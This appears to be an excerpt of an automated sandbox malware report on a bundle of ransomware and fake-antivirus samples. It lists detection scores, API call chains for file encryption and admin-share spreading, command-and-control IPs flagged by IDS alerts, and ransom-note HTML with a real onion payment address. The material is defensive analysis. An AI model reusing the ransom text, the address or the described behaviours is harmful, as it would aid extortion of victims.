        Source: C:\Users\user\AppData\Local\Temp\m0evjtwp.r3z\Endermanch@AnViPC2009.exeReversingLabs: Detection: 67%
        Source: C:\Users\user\AppData\Local\Temp\m0evjtwp.r3z\Endermanch@AnViPC2009.exeMetadefender: Detection: 24%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\nsduntxl.sn0\Endermanch@FakeAdwCleaner.exeReversingLabs: Detection: 70%
        Source: C:\Users\user\AppData\Local\Temp\nsduntxl.sn0\Endermanch@FakeAdwCleaner.exeMetadefender: Detection: 60%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\nuxubd5j.5lo\Endermanch@WannaCrypt0r.exeReversingLabs: Detection: 95%
        Source: C:\Users\user\AppData\Local\Temp\nuxubd5j.5lo\Endermanch@WannaCrypt0r.exeMetadefender: Detection: 88%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\qi2imphp.fcp\Endermanch@Xyeta.exeReversingLabs: Detection: 92%
        Source: C:\Users\user\AppData\Local\Temp\qi2imphp.fcp\Endermanch@Xyeta.exeMetadefender: Detection: 62%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeReversingLabs: Detection: 86%
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeMetadefender: Detection: 77%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\tkkkfnat.fk3\Endermanch@AntivirusPlatinum.exeReversingLabs: Detection: 77%
        Source: C:\Users\user\AppData\Local\Temp\tkkkfnat.fk3\Endermanch@AntivirusPlatinum.exeMetadefender: Detection: 28%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\vizhwbnh.yaz\Endermanch@BadRabbit.exeReversingLabs: Detection: 92%
        Source: C:\Users\user\AppData\Local\Temp\vizhwbnh.yaz\Endermanch@BadRabbit.exeMetadefender: Detection: 82%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exeReversingLabs: Detection: 100%
        Source: C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exeMetadefender: Detection: 84%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\yz5ggchg.xck\Endermanch@Krotten.exeReversingLabs: Detection: 96%
        Source: C:\Users\user\AppData\Local\Temp\yz5ggchg.xck\Endermanch@Krotten.exeMetadefender: Detection: 86%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\zfaio0hk.qy4\Endermanch@WinlockerVB6Blacksod.exeReversingLabs: Detection: 45%
        Source: C:\Users\user\AppData\Local\Temp\zfaio0hk.qy4\Endermanch@WinlockerVB6Blacksod.exeMetadefender: Detection: 31%Perma Link
        Source: C:\Users\user\AppData\Roaming\Windows\Error file remover 1.0.0.0\install\0A01606\fatalerror.exeReversingLabs: Detection: 50%
        Source: C:\Windows\dispci.exeReversingLabs: Detection: 96%
        Source: C:\Windows\dispci.exeMetadefender: Detection: 85%Perma Link
        Source: 1jDe7zWnoe.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Temp\101awtpm.1qs\Endermanch@NoMoreRansom.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Temp\1q3rmbaq.p1f\Endermanch@AntivirusPro2017.exeJoe Sandbox ML: detected
        Source: C:\ProgramData\vsMwMYIk\LOAcQQUU.exeJoe Sandbox ML: detected
        Source: C:\ProgramData\Windows\csrss.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Temp\ca1jm2wg.yla\Endermanch@HappyAntivirus.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Temp\bsejfx0c.zjs\Endermanch@ViraLock.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exeJoe Sandbox ML: detected
        Source: 47.0.Endermanch@Petya.A.exe.400000.2.unpackAvira: Label: TR/Crypt.XPACK.jvzj
        Source: 9.0.Endermanch@BadRabbit.exe.d0000.3.unpackAvira: Label: TR/ATRAPS.Gen
        Source: 58.0.dekAkckQ.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
        Source: 13.2.Endermanch@Cerber5.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen7
        Source: 21.0.Fantom.exe.400000.1.unpackAvira: Label: TR/AD.HiddenTear.huakh
        Source: 47.0.Endermanch@Petya.A.exe.400000.3.unpackAvira: Label: TR/Crypt.XPACK.jvzj
        Source: 11.0.Endermanch@Birele.exe.400000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
        Source: 11.0.Endermanch@Birele.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
        Source: 21.0.Fantom.exe.400000.2.unpackAvira: Label: TR/AD.HiddenTear.huakh
        Source: 9.0.Endermanch@BadRabbit.exe.d0000.1.unpackAvira: Label: TR/ATRAPS.Gen
        Source: 9.0.Endermanch@BadRabbit.exe.d0000.2.unpackAvira: Label: TR/ATRAPS.Gen
        Source: 47.0.Endermanch@Petya.A.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.jvzj
        Source: 21.0.Fantom.exe.400000.0.unpackAvira: Label: TR/AD.HiddenTear.huakh
        Source: 47.0.Endermanch@Petya.A.exe.400000.1.unpackAvira: Label: TR/Crypt.XPACK.jvzj
        Source: 11.0.Endermanch@Birele.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
        Source: 39.2.Endermanch@NoMoreRansom.exe.400000.0.unpackAvira: Label: TR/Crypt.FKM.Gen
        Source: 21.0.Fantom.exe.400000.3.unpackAvira: Label: TR/AD.HiddenTear.huakh
        Source: 13.2.Endermanch@Cerber5.exe.4e50000.2.unpackAvira: Label: TR/Crypt.XPACK.Gen7
        Source: 9.2.Endermanch@BadRabbit.exe.d0000.0.unpackAvira: Label: TR/ATRAPS.Gen
        Source: 9.0.Endermanch@BadRabbit.exe.d0000.0.unpackAvira: Label: TR/ATRAPS.Gen
        Source: 11.0.Endermanch@Birele.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_04775A73 GetSystemInfo,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,MapViewOfFile,CryptDuplicateHash,CryptHashData,LocalAlloc,CryptGetHashParam,LocalFree,CryptDestroyHash,UnmapViewOfFile,12_2_04775A73
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_04775613 CryptStringToBinaryW,CryptStringToBinaryW,LocalAlloc,LocalAlloc,CryptStringToBinaryW,CryptDecodeObjectEx,CryptDecodeObjectEx,LocalAlloc,CryptDecodeObjectEx,CryptImportPublicKeyInfo,LocalFree,LocalFree,12_2_04775613
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_04776299 CreateEventW,CreateThread,WaitForSingleObject,CloseHandle,CryptDestroyHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,CloseHandle,LocalFree,12_2_04776299
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_04776085 CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDestroyHash,12_2_04776085
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0477554A CryptAcquireContextW,GetLastError,CryptGenRandom,CryptReleaseContext,12_2_0477554A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_04775507 CryptAcquireContextW,CryptAcquireContextW,GetLastError,CryptAcquireContextW,12_2_04775507
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_04775D0A CryptDuplicateKey,CreateFileW,GetFileSizeEx,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,CreateFileMappingW,MapViewOfFile,CryptEncrypt,FlushViewOfFile,UnmapViewOfFile,FindCloseChangeNotification,CloseHandle,CryptDestroyKey,SetEvent,12_2_04775D0A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_04775BC4 GetSystemInfo,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,MapViewOfFile,CryptDuplicateHash,CryptHashData,LocalAlloc,CryptGetHashParam,memcpy,FlushViewOfFile,LocalFree,CryptDestroyHash,UnmapViewOfFile,12_2_04775BC4
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_047715A7 GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,HeapAlloc,CryptAcquireContextW,GetProcessHeap,HeapAlloc,CryptImportKey,CryptCreateHash,CryptSetHashParam,GetProcessHeap,HeapFree,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,12_2_047715A7
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_04776246 CryptCreateHash,CryptHashData,CryptGetHashParam,12_2_04776246
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_047756D8 CryptEncrypt,CryptEncrypt,LocalAlloc,memcpy,CryptEncrypt,LocalFree,12_2_047756D8
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0477559B CryptSetKeyParam,CryptSetKeyParam,CryptSetKeyParam,CryptGetKeyParam,LocalAlloc,CryptSetKeyParam,LocalFree,12_2_0477559B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_04775780 CryptBinaryToStringW,CryptBinaryToStringW,LocalAlloc,CryptBinaryToStringW,LocalFree,12_2_04775780
        Source: Endermanch@NoMoreRansom.exe, 00000027.00000002.597891270.00000000005BB000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----

        Exploits

        barindex
        Source: global trafficTCP traffic: 192.168.2.0:139Jump to behavior
        Source: global trafficTCP traffic: 192.168.2.2:139Jump to behavior
        Source: global trafficTCP traffic: 192.168.2.1:80Jump to behavior
        Source: global trafficTCP traffic: 192.168.2.4:445Jump to behavior
        Source: global trafficTCP traffic: 192.168.2.3:445Jump to behavior
        Source: global trafficTCP traffic: 192.168.2.0:139Jump to behavior
        Source: global trafficTCP traffic: 192.168.2.2:139Jump to behavior
        Source: global trafficTCP traffic: 192.168.2.1:445Jump to behavior
        Source: global trafficTCP traffic: 192.168.2.4:445Jump to behavior
        Source: global trafficTCP traffic: 192.168.2.3:445Jump to behavior

        Compliance

        barindex
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeUnpacked PE file: 13.2.Endermanch@Cerber5.exe.400000.0.unpack
        Source: 1jDe7zWnoe.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 23.50.105.163:443 -> 192.168.2.3:49683 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.3:49685 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49686 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.208.16.94:443 -> 192.168.2.3:49754 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.208.16.94:443 -> 192.168.2.3:49770 version: TLS 1.2
        Source: 1jDe7zWnoe.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: msi.pdb source: shiAB02.tmp.57.dr
        Source: Binary string: tscorlib.pdb source: Endermanch@DeriaLock.exe, 00000013.00000002.587407293.0000000000B31000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: X:\_WORK\encrypter\HiddenTear\Myexperements\hidden-tear-master\testfunction1\winupdate\WindowsFormsApplication5working\WindowsFormsApplication5\obj\Release\WindowsUpdate.pdb source: WindowsUpdate.exe.21.dr
        Source: Binary string: criticalupdate01.pdb source: Fantom.exe, 00000015.00000002.603139668.000000000221E000.00000004.00000800.00020000.00000000.sdmp, Fantom.exe, 00000015.00000003.317298815.00000000007FA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: F:\Windows.old\Users\ArizonaCode\Documents\Visual Studio 2013\Projects\UI\UI\obj\Debug\UI.pdb source: Endermanch@InfinityCrypt.exe, 0000001D.00000000.318134317.0000000000813000.00000002.00000001.01000000.0000000F.sdmp, Endermanch@InfinityCrypt.exe.0.dr
        Source: Binary string: F:\DESKTOP!\ChkDsk\ChkDsk\obj\Debug\PremiereCrack.pdb source: Endermanch@InfinityCrypt.exe, 0000001D.00000000.318837348.0000000000832000.00000002.00000001.01000000.0000000F.sdmp, Endermanch@InfinityCrypt.exe.0.dr
        Source: Binary string: d:\Projects\WinRAR\SFX\build\sfxrar32\Release\sfxrar.pdb0#AD#A source: Endermanch@AntivirusPlatinum.exe.0.dr
        Source: Binary string: C:\Users\victor\Desktop\BRANCH\win\Release\custact\x86\AICustAct.pdb source: Error file remover.msi.57.dr
        Source: Binary string: C:\Users\victor\Desktop\BRANCH\win\Release\custact\x86\aischeduler.pdb source: Error file remover.msi.57.dr
        Source: Binary string: _.pdb source: Fantom.exe, 00000015.00000003.339800325.0000000000824000.00000004.00000020.00020000.00000000.sdmp, Fantom.exe, 00000015.00000003.331454634.0000000000824000.00000004.00000020.00020000.00000000.sdmp, Fantom.exe, 00000015.00000003.329696498.0000000000824000.00000004.00000020.00020000.00000000.sdmp, Fantom.exe, 00000015.00000002.603139668.000000000221E000.00000004.00000800.00020000.00000000.sdmp, Fantom.exe, 00000015.00000003.333521051.0000000000824000.00000004.00000020.00020000.00000000.sdmp, Fantom.exe, 00000015.00000003.329275374.0000000000824000.00000004.00000020.00020000.00000000.sdmp, Fantom.exe, 00000015.00000003.326540763.0000000000824000.00000004.00000020.00020000.00000000.sdmp, Fantom.exe, 00000015.00000003.317298815.00000000007FA000.00000004.00000020.00020000.00000000.sdmp, Fantom.exe, 00000015.00000003.330476873.0000000000824000.00000004.00000020.00020000.00000000.sdmp, Fantom.exe, 00000015.00000003.329351499.0000000000824000.00000004.00000020.00020000.00000000.sdmp, Fantom.exe, 00000015.00000003.328467214.0000000000824000.00000004.00000020.00020000.00000000.sdmp, Fantom.exe, 00000015.00000003.330050682.0000000000824000.00000004.00000020.00020000.00000000.sdmp, Fantom.exe, 00000015.00000003.328833959.0000000000824000.00000004.00000020.00020000.00000000.sdmp, Fantom.exe, 00000015.00000003.332731159.0000000000824000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\victor\Desktop\BRANCH\win\Release\stubs\x86\ExternalUi.pdb source: Endermanch@WinlockerVB6Blacksod.exe, 00000039.00000000.415216580.00000000009CE000.00000002.00000001.01000000.00000018.sdmp, Endermanch@WinlockerVB6Blacksod.exe.0.dr
        Source: Binary string: GoogleCrashHandler_unsigned.pdb} source: Endermanch@Petya.A.exe, 0000002F.00000000.351611217.0000000000428000.00000002.00000001.01000000.00000015.sdmp, Endermanch@Petya.A.exe, 0000002F.00000002.540745824.0000000000428000.00000002.00000001.01000000.00000015.sdmp
        Source: Binary string: msi.pdbUGP source: shiAB02.tmp.57.dr
        Source: Binary string: d:\Projects\WinRAR\SFX\build\sfxrar32\Release\sfxrar.pdb source: Endermanch@AntivirusPlatinum.exe.0.dr
        Source: Binary string: GoogleCrashHandler_unsigned.pdb source: Endermanch@Petya.A.exe, 0000002F.00000000.351611217.0000000000428000.00000002.00000001.01000000.00000015.sdmp, Endermanch@Petya.A.exe, 0000002F.00000002.540745824.0000000000428000.00000002.00000001.01000000.00000015.sdmp
        Source: Binary string: C:\Users\victor\Desktop\BRANCH\win\Release\custact\x86\aischeduler2.pdb source: Error file remover.msi.57.dr
        Source: Binary string: Y:\35\z1h\3uhpi3uv\1u\jq8jvj\1ao\n\2no\d4uongw.pdb source: Endermanch@AntivirusPro2017.exe.0.dr
        Source: Binary string: C:\Windows.old\Users\ArizonaCode\Documents\Visual Studio 2013\Projects\LOGON\LOGON\obj\Debug\LOGON.pdb source: Endermanch@DeriaLock.exe, 00000013.00000000.311063091.0000000000362000.00000002.00000001.01000000.0000000C.sdmp
        Source: Binary string: dcrypt.pdb source: rundll32.exe, 0000000C.00000003.327238742.0000000003073000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.304582247.000000000305C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.314915403.0000000003073000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.344517005.0000000003073000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.pdb source: Endermanch@DeriaLock.exe, 00000013.00000002.600679301.0000000000BC9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\victor\Desktop\BRANCH\win\Release\stubs\x86\ExternalUi.pdbL source: Endermanch@WinlockerVB6Blacksod.exe, 00000039.00000000.415216580.00000000009CE000.00000002.00000001.01000000.00000018.sdmp, Endermanch@WinlockerVB6Blacksod.exe.0.dr
        Source: Binary string: C:\Users\victor\Desktop\BRANCH\win\Release\custact\x86\AICustAct.pdb,0 source: Error file remover.msi.57.dr

        Spreading

        barindex
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_04779534 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,GetLastError,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,OpenSCManagerW,memset,GetSystemTimeAsFileTime,wsprintfW,CreateServiceW,StartServiceW,GetLastError,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,DeleteFileW,WNetCancelConnection2W,SetLastError, \\%s\admin$12_2_04779534
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_04779B63 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,GetCurrentThread,OpenThreadToken,DuplicateTokenEx,memset,GetSystemDirectoryW,CloseHandle,PathAppendW,PathFileExistsW,wsprintfW,CreateProcessAsUserW,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,PathFileExistsW,GetLastError,GetLastError,DeleteFileW,CloseHandle,CloseHandle,WNetCancelConnection2W,SetLastError, \\%s\admin$12_2_04779B63
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeFile opened: z:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeFile opened: x:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeFile opened: v:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeFile opened: t:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeFile opened: r:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeFile opened: p:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeFile opened: n:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeFile opened: l:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeFile opened: j:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeFile opened: h:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeFile opened: f:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeFile opened: b:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeFile opened: y:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeFile opened: w:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeFile opened: u:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeFile opened: s:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeFile opened: q:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeFile opened: o:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeFile opened: m:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeFile opened: k:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeFile opened: i:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeFile opened: g:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeFile opened: e:Jump to behavior
        Source: C:\Windows\SysWOW64\fsutil.exeFile opened: c:
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeFile opened: a:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeCode function: 11_2_004048F8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,11_2_004048F8
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_04775E9F PathCombineW,FindFirstFileW,WaitForMultipleObjects,PathCombineW,StrStrIW,PathFindExtensionW,FindNextFileW,FindClose,12_2_04775E9F

        Networking

        barindex
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.0 139Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.2 139Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.1 80Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.4 445Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.3 445Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 178.79.242.0 445Jump to behavior
        Source: TrafficSnort IDS: 2023619 ET TROJAN Ransomware/Cerber Checkin M3 (8) 192.168.2.3:65523 -> 93.107.12.0:6893
        Source: TrafficSnort IDS: 2849814 ETPRO MALWARE TakeMyFile User-Agent 192.168.2.3:49772 -> 54.242.4.101:80
        Source: TrafficSnort IDS: 2849813 ETPRO MALWARE TakeMyFile Installer Checkin 192.168.2.3:49772 -> 54.242.4.101:80
        Source: TrafficSnort IDS: 2809804 ETPRO MALWARE FakeAdwareCleaner.A Checkin 192.168.2.3:49787 -> 185.53.177.53:80
        Source: Endermanch@Cerber5.exe, 0000000D.00000003.311391173.0000000005102000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://{TOR}.onion/{PC_ID}
        Source: Endermanch@Cerber5.exe, 0000000D.00000003.341552127.0000000005125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>type or copy the add<span class="h">{RAND}</span>ress <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> in this browser address bar;</li>
        Source: Endermanch@Cerber5.exe, 0000000D.00000003.341552127.0000000005125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br>
        Source: Endermanch@Cerber5.exe, 0000000D.00000003.341552127.0000000005125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br></li>
        Source: Endermanch@Cerber5.exe, 0000000D.00000003.341552127.0000000005125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>typ of kopieer het a<span class="h">{RAND}</span>dres <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> in de adresbalk van uw browser;</li>
        Source: Endermanch@Cerber5.exe, 0000000D.00000003.341552127.0000000005125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: adresse <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> dans cette barre d
        Source: Endermanch@Cerber5.exe, 0000000D.00000003.341552127.0000000005125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>tippen oder kopieren Sie die Adresse <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> in diese Browser-Adressleiste;</li>
        Source: Endermanch@Cerber5.exe, 0000000D.00000003.341552127.0000000005125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>digitare o copiare l'indirizzo <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> nella barra degli indirizzi di questo browser;</li>
        Source: Endermanch@Cerber5.exe, 0000000D.00000003.341552127.0000000005125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>wpisz lub skopiuj adres <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> do paska adresu przegl
        Source: Endermanch@Cerber5.exe, 0000000D.00000003.341552127.0000000005125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: o <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> nesta barra de endere
        Source: Endermanch@Cerber5.exe, 0000000D.00000003.341552127.0000000005125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: n <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> en la barra de direcciones de este navegador;</li>
        Source: Endermanch@Cerber5.exe, 0000000D.00000003.341552127.0000000005125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: n adres <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br>
        Source: Endermanch@Cerber5.exe, 0000000D.00000003.341552127.0000000005125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>type or copy the add<span class="h">UXQ3W9G</span>ress <br><span class="info">http://xpcx6erilkjced3j.onion/7E0A-369D-D0F0-0098-B26C</span><br> in this browser address bar;</li>
        Source: Endermanch@Cerber5.exe, 0000000D.00000003.341552127.0000000005125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <br><span class="info">http://xpcx6erilkjced3j.onion/7E0A-369D-D0F0-0098-B26C</span><br>
        Source: Endermanch@Cerber5.exe, 0000000D.00000003.341552127.0000000005125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <br><span class="info">http://xpcx6erilkjced3j.onion/7E0A-369D-D0F0-0098-B26C</span><br></li>
        Source: Endermanch@Cerber5.exe, 0000000D.00000003.341552127.0000000005125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>typ of kopieer het a<span class="h">VKPc3</span>dres <br><span class="info">http://xpcx6erilkjced3j.onion/7E0A-369D-D0F0-0098-B26C</span><br> in de adresbalk van uw browser;</li>
        Source: Endermanch@Cerber5.exe, 0000000D.00000003.341552127.0000000005125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: adresse <br><span class="info">http://xpcx6erilkjced3j.onion/7E0A-369D-D0F0-0098-B26C</span><br> dans cette barre d
        Source: Endermanch@Cerber5.exe, 0000000D.00000003.341552127.0000000005125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>tippen oder kopieren Sie die Adresse <br><span class="info">http://xpcx6erilkjced3j.onion/7E0A-369D-D0F0-0098-B26C</span><br> in diese Browser-Adressleiste;</li>
        Source: Endermanch@Cerber5.exe, 0000000D.00000003.341552127.0000000005125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>digitare o copiare l'indirizzo <br><span class="info">http://xpcx6erilkjced3j.onion/7E0A-369D-D0F0-0098-B26C</span><br> nella barra degli indirizzi di questo browser;</li>
        Source: Endermanch@Cerber5.exe, 0000000D.00000003.341552127.0000000005125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>wpisz lub skopiuj adres <br><span class="info">http://xpcx6erilkjced3j.onion/7E0A-369D-D0F0-0098-B26C</span><br> do paska adresu przegl
        Source: Endermanch@Cerber5.exe, 0000000D.00000003.341552127.0000000005125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: o <br><span class="info">http://xpcx6erilkjced3j.onion/7E0A-369D-D0F0-0098-B26C</span><br> nesta barra de endere
        Source: Endermanch@Cerber5.exe, 0000000D.00000003.341552127.0000000005125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: n <br><span class="info">http://xpcx6erilkjced3j.onion/7E0A-369D-D0F0-0098-B26C</span><br> en la barra de direcciones de este navegador;</li>
        Source: Endermanch@Cerber5.exe, 0000000D.00000003.341552127.0000000005125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: n adres <br><span class="info">http://xpcx6erilkjced3j.onion/7E0A-369D-D0F0-0098-B26C</span><br>
        Source: Endermanch@Cerber5.exe, 0000000D.00000002.369292879.0000000005108000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xpcx6erilkjced3j.onion/7E0A-369D-D0F0-0098-B26C
        Source: Endermanch@Cerber5.exe, 0000000D.00000002.369995185.0000000005136000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>type or copy the add<span class="h">UXQ3W9G</span>ress <br><span class="info">http://xpcx6erilkjced3j.onion/7E0A-369D-D0F0-0098-B26C</span><br> in this browser address bar;</li>
